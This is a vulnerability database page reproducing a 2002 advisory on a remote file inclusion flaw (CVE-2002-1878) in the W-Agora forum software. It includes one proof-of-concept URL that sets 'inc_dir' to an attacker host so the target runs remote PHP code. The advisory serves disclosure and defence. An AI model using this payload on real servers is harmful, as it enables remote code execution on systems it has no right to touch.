Recent Vulnerabilities Research Posts Trends Blog About Contact

Related Vulnerabilities: CVE-2002-1878

Publish Date: 10 Jun 2002

Author: frog

                							

                source: http://www.securityfocus.com/bid/4977/info

W-Agora is prone to an issue which may allow an attacker to include arbitrary files located on a remote server. In particular, the 'inc_dir' variable found in a number of the W-Agora scripts defines the path to the configuration file. It is possible, under some configurations, for an attacker to specify an arbitrary value for the location of the configuration file which points to a file on a remote server.

If the included file is a PHP script, this may allow for execution of arbitrary attacker-supplied code.

http://[target]/include/oci8.php?inc_dir=http://www.attacker.com&amp;ext=txt

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Twitter Reddit Linkedin Facebook

W-Agora 4.1.x - Remote File Inclusion

Vulmon Search

About

Products

Connect